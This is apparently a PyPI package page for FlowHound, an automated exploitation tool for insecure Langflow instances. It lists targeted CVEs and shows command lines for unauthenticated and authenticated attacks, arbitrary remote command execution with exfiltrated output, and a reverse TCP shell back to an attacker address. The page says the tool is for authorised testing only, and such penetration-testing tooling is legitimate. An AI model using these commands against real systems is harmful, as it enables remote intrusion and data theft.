Skip to main content

FlowHound

FlowHound Logo

Automated exploitation platform for scanning and testing insecure Langflow deployments.

Documentation

Full documentation is available at flowhound.readthedocs.io.

Installation

pip install .

Usage

FlowHound exposes two sub-commands: attack and sniff.

attack — launch exploits against a target

flowhound attack --url <target-url> [OPTIONS]
Option Required Description
--url Yes URL of the target Langflow instance (e.g. http://localhost:7860)
--username No Langflow username — must be paired with --password
--password No Langflow password — must be paired with --username
--autopwn No Run all matching exploits instead of stopping at the first success
--proxy No HTTP(s) proxy to route traffic through (e.g. http://127.0.0.1:8080)
--command No Shell command to execute on the target via the execute_bash_command payload
--reverse_shell No LHOST:LPORT for a reverse TCP shell payload (e.g. 192.168.1.10:4444)
-h, --help No Show help message

--command and --reverse_shell are mutually exclusive. --username and --password must always be supplied together.

sniff — detect version and list applicable CVEs

flowhound sniff --url <target-url> [--proxy <proxy-url>]
Option Required Description
--url Yes URL of the target Langflow instance
--proxy No HTTP(s) proxy to route traffic through
-h, --help No Show help message

Examples

Unauthenticated attack (stops at first successful exploit):

flowhound attack --url http://target.example.com:7860

Authenticated attack (includes auth-required CVEs):

flowhound attack --url http://target.example.com:7860 --username admin --password secret

Run all matching exploits with a custom command payload:

flowhound attack --url http://target.example.com:7860 --autopwn --command "whoami"

Catch a reverse shell:

flowhound attack --url http://target.example.com:7860 --reverse_shell 192.168.1.10:4444

Route all traffic through a proxy:

flowhound attack --url http://target.example.com:7860 --proxy http://127.0.0.1:8080

Detect the target Langflow version and list applicable CVEs without launching any exploits:

flowhound sniff --url http://target.example.com:7860

Architecture

Software Architecture Diagram

How it works

  1. Version detection — queries /api/v1/version on the target to determine the running Langflow version.
  2. CVE lookup — queries the bundled vulnerabilities.json database for CVE records whose affected version range covers the detected version. Authentication-required exploits are only included when credentials are supplied.
  3. Exploit dispatch — dynamically loads each matching exploit module and executes it. Unauthenticated RCE exploits are prioritised. Each exploit is run with a 60-second timeout; timed-out exploits are skipped automatically.
  4. Payload injection — when --command or --reverse_shell is specified the corresponding payload is injected into each exploit rather than the built-in default.

CVE coverage

CVE ID CVSS Auth Required Affected Versions
CVE-2026-9198 10.0 No 1.0.0 – 1.10.0
CVE-2026-0768 9.8 No 1.4.2
CVE-2026-19295 9.9 Yes 1.0.0 – 1.11.1
CVE-2026-19286 9.8 Yes 1.11.0 – 1.11.1
CVE-2026-18729 8.8 Yes 1.0.0 – 1.11.1
CVE-2026-5027 8.8 Yes 1.0.0 – 1.8.4
CVE-2026-7873 8.8 Yes 1.0.0 – 1.10.0
CVE-2026-10134 8.8 Yes 1.0.0 – 1.9.3

Payloads

Payload CLI flag Description
execute_bash_command --command "<cmd>" Runs an arbitrary shell command and exfiltrates stdout
reverse_tcp_shell --reverse_shell LHOST:LPORT Opens a reverse TCP shell back to the attacker (blocking)

When no payload flag is given each exploit falls back to its built-in default (runs id and exfiltrates the result).

Project structure

flowhound/
├── __main__.py                  # CLI entry point; registers attack and sniff commands
├── cli/
│   ├── command.py               # attack and sniff Click command definitions
│   ├── validators.py            # URL, proxy, and CVE input validators
│   ├── banner.py                # ASCII-art banner
│   └── message_format.py       # Coloured logging handler (ClickLogHandler)
└── vulnerabilities/
    ├── cve/cve.py               # CVE data model; dynamically loads exploit modules
    ├── io/
    │   ├── database.py          # Reads vulnerabilities.json; filters by version & auth
    │   ├── version_detection.py # Queries /api/v1/version; version string ↔ tuple helpers
    │   └── vulnerabilities.json # Bundled CVE data store
    ├── exploits/
    │   ├── base_exploit_class.py  # Abstract base; auto_login / authenticate helpers
    │   └── cve_2026_*.py          # Individual exploit PoC modules
    └── payloads/
        ├── base_payload_class.py  # Abstract base; generate_payload / load_payload interface
        ├── execute_bash_command.py
        └── reverse_tcp_shell.py

Requirements

  • Python 3.10+
  • requests >= 2.32.3
  • click >= 8.1.8

Running tests

pip install pytest
pytest flowhound/tests/

Disclaimer

FlowHound is intended for authorised security testing only. Do not run it against systems you do not own or have explicit written permission to test.

Metadata

Release files for flowhound 1.0.0

For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.

Source distribution (sdist)

Source distribution for flowhound 1.0.0
File Size Uploaded
flowhound-1.0.0.tar.gz 29.3 kB Details

Built distribution (wheel)

Table of built distributions (wheels) for flowhound 1.0.0
File Interpreter ABI Platform
flowhound-1.0.0-py3-none-any.whl Python 3 none any Details

Total release size: 72.2 kB

Release files / flowhound-1.0.0.tar.gz

Download URL flowhound-1.0.0.tar.gz
Size 29.3 kB
Tags Source
SHA-256 checksum
How to use checksums
4d99725f84be11b5d1713f78bc75504abed8f600499a8d357d17499bdcc9cc71
BLAKE2b-256 checksum
How to use checksums
2291e87c6a26218f143ce7c1f39297555c73db7ccdf52a52c3b00e6016622290
Upload date
Uploaded using Trusted Publishing?
What is trusted publishing?
Yes
Uploaded via twine/7.0.0 CPython/3.13.14

Provenance

Provenance describes where a file came from. On PyPI, provenance is shared via attestations, which provide a verifiable record of the build or publishing details. View details, limitations and caveats.

PyPI Publish Attestation

PyPI verified that this artifact, at this checksum, originated from the publisher listed below.

Signed by GitHub Actions, verified by PyPI on Sep 21, 2026.

Transparency log

Release files / flowhound-1.0.0-py3-none-any.whl

Download URL flowhound-1.0.0-py3-none-any.whl
Size 42.9 kB
Tags Python 3
SHA-256 checksum
How to use checksums
808a158b891a8b5fa0e7cd8fe9d618c9bcefd2dd7fdeec8a3a3407c6eb087959
BLAKE2b-256 checksum
How to use checksums
b81f4084474512b42e56720c3472afb9e00193f48414a099f79c9cbe76ed6da1
Upload date
Uploaded using Trusted Publishing?
What is trusted publishing?
Yes
Uploaded via twine/7.0.0 CPython/3.13.14

Provenance

Provenance describes where a file came from. On PyPI, provenance is shared via attestations, which provide a verifiable record of the build or publishing details. View details, limitations and caveats.

PyPI Publish Attestation

PyPI verified that this artifact, at this checksum, originated from the publisher listed below.

Signed by GitHub Actions, verified by PyPI on Sep 21, 2026.

Transparency log

Release history Release notifications | RSS feed

1.1.0

2 release files

This release

1.0.0 This release

2 release files

Anthropic, PBC Visionary sponsor Bloomberg Visionary sponsor Hudson River Trading Visionary sponsor Meta Visionary sponsor NVIDIA Visionary sponsor Microsoft Sustainability sponsor Depot Continuous Integration AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Sentry Error logging StatusPage Status page